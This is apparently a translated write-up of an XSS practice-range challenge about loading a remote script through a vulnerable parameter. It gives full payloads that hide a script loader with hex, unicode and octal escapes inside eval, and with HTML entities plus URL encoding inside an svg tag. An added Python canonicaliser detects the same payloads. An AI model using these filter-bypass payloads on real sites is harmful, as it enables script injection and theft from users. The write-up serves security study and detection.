When your talent
cannot yet carry your ambition,
you should calm down and study.
To begin, thanks to big brother Xiaocao for providing the XSS practice range and to the masters in the group for sharing their ideas. Thank you, big brothers; riding your coattails is very comfortable, and there really is a lot of strange and wonderful knowledge out there.
0x01 Dugu Nine Swords, First Form [Xiaocao]
Last night I saw in the group the XSS practice range that Xiaocao built, so after waking up today I came to learn a few more of those strange tricks. We first visit the page and find that a master has already laid out the approach: this challenge is not about discovering the XSS vulnerability but about how to exploit it; a scanner will not find anything for you.
Challenge:
We are required to load arbitrary JS code, specifically to successfully load http://xcao.vip/xss/alert.js
window._alert = alert;
window.alert = function (data) { _alert("success"); };
alert(1);
Entity encoding converter: http://bianma.51240.com/
0x02 Eval + JavaScript encoding bypass
Approach:
- Use document.createElement() to create a <script> element.
- Then use document.body.appendChild() to append the specified DOM node to the end of document.body.
Hexadecimal:
\x61\x67\x61\x6E\x3D\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74\x28\x27\x53\x43\x52\x49\x50\x54\x27\x29\x3B\x61\x67\x61\x6E\x2E\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x78\x63\x61\x6F\x2E\x76\x69\x70\x2F\x78\x73\x73\x2F\x61\x6C\x65\x72\x74\x2E\x6A\x73\x27\x3B\x64\x6F\x63\x75\x6D\x65\x6E\x74\x2E\x62\x6F\x64\x79\x2E\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64\x28\x61\x67\x61\x6E\x29\x3B
XSS Payload:
agan=document.createElement('SCRIPT');agan.src='http://xcao.vip/xss/alert.js';document.body.appendChild(agan);
The popup fires successfully.
Unicode:
\u0061\u0067\u0061\u006E\u003D\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0063\u0072\u0065\u0061\u0074\u0065\u0045\u006C\u0065\u006D\u0065\u006E\u0074\u0028\u0027\u0053\u0043\u0052\u0049\u0050\u0054\u0027\u0029\u003B\u0061\u0067\u0061\u006E\u002E\u0073\u0072\u0063\u003D\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0078\u0063\u0061\u006F\u002E\u0076\u0069\u0070\u002F\u0078\u0073\u0073\u002F\u0061\u006C\u0065\u0072\u0074\u002E\u006A\u0073\u0027\u003B\u0064\u006F\u0063\u0075\u006D\u0065\u006E\u0074\u002E\u0062\u006F\u0064\u0079\u002E\u0061\u0070\u0070\u0065\u006E\u0064\u0043\u0068\u0069\u006C\u0064\u0028\u0061\u0067\u0061\u006E\u0029\u003B
XSS Payload:
http://xcao.vip/test/xss1.php?data=xxx%22%3E%3Cscript%3Eeval.call`${%27\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073%27}`%3C/script%3E
Octal:
\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073
XSS Payload:
http://xcao.vip/test/xss1.php?data=xxx%22%3E%3Cscript%3Eeval.call`${%27\141\147\141\156\075\144\157\143\165\155\145\156\164\056\143\162\145\141\164\145\105\154\145\155\145\156\164\050\047\123\103\122\111\120\124\047\051\073\141\147\141\156\056\163\162\143\075\047\150\164\164\160\072\057\057\170\143\141\157\056\166\151\160\057\170\163\163\057\141\154\145\162\164\056\152\163\047\073\144\157\143\165\155\145\156\164\056\142\157\144\171\056\141\160\160\145\156\144\103\150\151\154\144\050\141\147\141\156\051\073%27}`%3C/script%3E
0x03 HTML entity encoding + URL encoding bypass
Approach:
Scalable Vector Graphics (SVG) is an XML-based vector image format for two-dimensional graphics that supports interactivity and animation.
SVG files can also embed JavaScript code; for example, developers may use JavaScript inside an SVG image so they can manipulate it in real time.
If a website loads an SVG file that carries an XSS payload, that payload is executed.
- First apply HTML entity encoding to the document... snippet below, then URL-encode the result.
- Finally, use <SVG> to get it past the filter.
Note: HTML tags accept both decimal and hexadecimal character references, so first decimal-encode javascript:alert(1), then URL-encode it once more. Why is the extra encoding needed? Because the parameter value contains & and #, which need a round of URL encoding.
agan=document.createElement('SCRIPT');agan.src='http://xcao.vip/xss/alert.js';document.body.appendChild(agan);
or
document.body.appendChild(document.createElement('script')).src='http://xcao.vip/xss/alert.js'
XSS Payload:
http://xcao.vip/test/xss1.php?data="><svg><script>%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x3D%3b%26%23x64%3b%26%23x6F%3b%26%23x63%3b%26%23x75%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x2E%3b%26%23x63%3b%26%23x72%3b%26%23x65%3b%26%23x61%3b%26%23x74%3b%26%23x65%3b%26%23x45%3b%26%23x6C%3b%26%23x65%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x28%3b%26%23x27%3b%26%23x53%3b%26%23x43%3b%26%23x52%3b%26%23x49%3b%26%23x50%3b%26%23x54%3b%26%23x27%3b%26%23x29%3b%26%23x3B%3b%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x2E%3b%26%23x73%3b%26%23x72%3b%26%23x63%3b%26%23x3D%3b%26%23x27%3b%26%23x68%3b%26%23x74%3b%26%23x74%3b%26%23x70%3b%26%23x3A%3b%26%23x2F%3b%26%23x2F%3b%26%23x78%3b%26%23x63%3b%26%23x61%3b%26%23x6F%3b%26%23x2E%3b%26%23x76%3b%26%23x69%3b%26%23x70%3b%26%23x2F%3b%26%23x78%3b%26%23x73%3b%26%23x73%3b%26%23x2F%3b%26%23x61%3b%26%23x6C%3b%26%23x65%3b%26%23x72%3b%26%23x74%3b%26%23x2E%3b%26%23x6A%3b%26%23x73%3b%26%23x27%3b%26%23x3B%3b%26%23x64%3b%26%23x6F%3b%26%23x63%3b%26%23x75%3b%26%23x6D%3b%26%23x65%3b%26%23x6E%3b%26%23x74%3b%26%23x2E%3b%26%23x62%3b%26%23x6F%3b%26%23x64%3b%26%23x79%3b%26%23x2E%3b%26%23x61%3b%26%23x70%3b%26%23x70%3b%26%23x65%3b%26%23x6E%3b%26%23x64%3b%26%23x43%3b%26%23x68%3b%26%23x69%3b%26%23x6C%3b%26%23x64%3b%26%23x28%3b%26%23x61%3b%26%23x67%3b%26%23x61%3b%26%23x6E%3b%26%23x29%3b%26%23x3B%3b</script></svg>
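Added example, not code from the original post or from the practice range: a Python canonicaliser that peels the three encoding layers these payloads rely on (URL encoding, HTML numeric entities decoded inside <svg><script>, and the \xHH / \uHHHH / \ooo escapes that eval() resolves inside a string) before pattern-matching, showing that a detector matching the raw parameter misses both the 0x02 and the 0x03 payload while the canonical form is caught. The encoders, the sample values and the loader signature are constructed for this illustration.

```python
import html
import re
from urllib.parse import quote, unquote
# The loader script from the page, in plain form.
PLAIN = ("agan=document.createElement('SCRIPT');"
         "agan.src='http://xcao.vip/xss/alert.js';"
         "document.body.appendChild(agan);")

# Encoders reproducing the page's hex, unicode and octal JS escapes and its
# hex-entity-then-URL form; used only to build the constructed sample inputs.
def js_hex(s):     return "".join(f"\\x{ord(c):02X}" for c in s)
def js_unicode(s): return "".join(f"\\u{ord(c):04X}" for c in s)
def js_octal(s):   return "".join(f"\\{ord(c):03o}" for c in s)
def entity_then_url(s): return quote("".join(f"&#x{ord(c):x};" for c in s), safe="")
# Escapes eval() resolves inside a JS string literal: \xHH, \u{H..}, \uHHHH, \ooo.
_JS_ESC = re.compile(r"\\x([0-9A-Fa-f]{2})|\\u\{([0-9A-Fa-f]+)\}"
                     r"|\\u([0-9A-Fa-f]{4})|\\([0-3][0-7]{2}|[0-7]{1,2})")

def js_unescape(s):
    def repl(m):
        hx, brace, uni, oct_ = m.groups()
        if oct_ is not None:
            return chr(int(oct_, 8))
        return chr(int(hx or brace or uni, 16))
    return _JS_ESC.sub(repl, s)

def canonicalise(value, max_rounds=5):
    """Peel URL, entity and JS-escape layers until the value stops changing."""
    for _ in range(max_rounds):
        nxt = js_unescape(html.unescape(unquote(value)))
        if nxt == value:
            break
        value = nxt
    return value

# Order-independent signature for "create a <script>, point src at a remote
# file, attach it to the DOM"; covers both loader variants shown on the page.
_LOADER = [r"createElement\(\s*['\"]script['\"]\s*\)", r"\.src\s*=", r"appendChild\("]
def is_script_loader(value):
    """Return (hit on the raw value, hit after canonicalising)."""
    raw = all(re.search(p, value, re.I) for p in _LOADER)
    canon = all(re.search(p, canonicalise(value), re.I) for p in _LOADER)
    return raw, canon

def sample_payloads():
    """Constructed values shaped like the 0x02 (octal in eval) and 0x03 (entities in svg) payloads."""
    loader = "xxx%22%3E%3Cscript%3Eeval.call`${%27" + js_octal(PLAIN) + "%27}`%3C/script%3E"
    svg = '"><svg><script>' + entity_then_url(PLAIN) + "</script></svg>"
    return {"eval_octal": loader, "svg_entity": svg}
```

A WAF or log-analysis rule that matches on the raw query string sees only escape sequences; the same rule applied to canonicalise(value) sees the loader.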
There are of course other bypass techniques; anyone interested can try them one by one: the data: protocol (not supported by IE), URL encoding, and so on. This challenge is not about popping an XSS alert but about loading a JS file; don't fall into that trap.
Though we live in the gutter, some of us are still looking at the stars!